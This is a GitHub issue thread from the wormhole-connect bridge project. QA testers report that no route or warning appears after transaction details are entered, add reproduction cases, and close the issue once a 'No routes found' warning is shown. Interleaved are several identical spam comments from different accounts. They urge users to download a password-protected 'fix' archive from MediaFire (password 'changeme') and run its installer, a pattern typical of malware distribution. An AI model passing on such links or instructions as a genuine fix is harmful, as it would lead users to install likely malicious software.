### ISSUE TITLE
[QA] No route or warning appears after entering the transaction details

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2449]
## Describe the current behavior in detail
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) (Connect v2) with macOS Sonoma 14.5 and Google Chrome Version 128.0.6613.85 (Official Build) (arm64).

Steps:
1. Select Ethereum network and ETH token in "From" section
2. Select Aptos network and APT token in "To" section (in my case, Spika wallet was auto-connected)
3. Click on "Connect source wallet" and connect MetaMask wallet
4. Enter Amount, in my case 0.0001
5. Check if route or warning is displayed

Actual result: No route or warning appears.
Expected result: Route or warning appears.

## Notes/ Attachments

![image](https://github.com/user-attachments/assets/f1ded8b4-b7b6-46ee-9629-73d2041c4d70)

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tsadovska** [comment]
Issue is also reproducible when swapping FTM from Fantom (MetaMask) to ETH (Ethereum). No route or warning appears. Checked on https://wormhole-connect-mainnet.netlify.app/.

![image](https://github.com/user-attachments/assets/d05d9cc0-a74d-4bf6-bf84-377fb1a3b89e)

**Comment by agodlevska** [comment]
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) (Connect v2) with macOS Sonoma 14.6.1 and Google Chrome Version 128.0.6613.85 (Official Build) (x86_64).

The "Review Transaction" button appears and is active, but nothing happens when clicked. There are no errors or warnings provided to the user, leaving them without any indication of what went wrong or what to do next.

Attachment:

https://github.com/user-attachments/assets/c82fbece-a95d-4562-bb38-0752c511f7d9

**Comment by tsadovska** [comment]
Issue is also reproducible [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) when sending 0.0001 USDT from Base (MetaMask) to Arbitrum (MetaMask).

![image](https://github.com/user-attachments/assets/28e006ee-29fd-4c3c-90c3-25944b14d5e5)

**Comment by agodlevska** [comment]
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D). 
Issue is no longer reproducible for all scenarios above, warning "No routes found for this transaction" is shown for user. 

Closing the ticket. 

Attachment:
<img width="1440" alt="Screenshot 2024-10-14 at 11 16 50" src="https://github.com/user-attachments/assets/ddb100c7-c90c-42a0-aac1-a8f9237f4e1d">
